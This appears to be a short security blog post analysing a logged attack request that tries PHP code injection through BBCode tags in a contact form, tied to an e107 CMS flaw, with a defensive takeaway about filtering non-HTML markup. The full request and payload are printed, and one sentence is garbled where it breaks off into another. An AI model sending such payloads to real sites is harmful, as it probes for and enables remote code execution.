POST /home.php/contact.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: my.calstateteach.net
User-Agent: MaMa CaSpEr
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
send-contactus=1&author_name=[php]echo('casper'.php_uname().'kae');die();[/php]
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: my.calstateteach.net
User-Agent: MaMa CaSpEr
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
send-contactus=1&author_name=[php]echo('casper'.php_uname().'kae');die();[/php]
Looking more closely at the payload, I saw that while it looks like PHP code injection (the use of “echo”, “php_unmae” and “die()” are good indications of that), this code injection doesn’t start with the expected PHP declaration “a vulnerability in the BBCode, discovered in the e107 content management system application. This vulnerability allow a malicious user to execute arbitrary and malicious PHP code in the context of the web server process.
What does BBCode stand for?
No, it’s got nothing to do with BBC – the British Broadcasting Corporation. Bulletin Board Code or BBCode is a lightweight markup language used to format posts in many message boards. The available tags are usually indicated by square brackets surrounding a keyword, and they are parsed by the message board system before being translated into a markup language that web browsers understand—usually HTML or XHTML.
Food for thought
Always looking for ways to protect web applications from being abused by content injection attacks (e.g. - comment spamming, stored XSS or HTML injection), this leads me to the conclusion that web application security filters should also be aware of other (non HTML) markup languages and be able to protect the application from being vulnerable to such attacks.
No comments:
Post a Comment